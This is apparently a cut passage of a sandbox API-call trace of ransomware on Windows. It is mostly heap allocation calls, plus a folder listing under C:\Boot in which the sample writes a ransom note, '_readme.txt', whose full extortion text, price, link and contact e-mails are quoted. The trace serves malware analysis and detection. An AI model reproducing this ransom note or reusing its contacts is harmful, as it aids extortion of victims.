(HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.912] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.912] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.913] CloseHandle (hObject=0x6f0) returned 1 [0142.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.914] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8c7dbf0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c7dbf0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.914] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8c7dbf0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c7dbf0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.914] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.914] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c7dbf0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8c7dbf0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c7dbf0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.914] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8c7dbf0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8c7dbf0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8c7dbf0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.914] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.914] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.917] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.917] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.919] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.919] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.919] HeapFree (in: 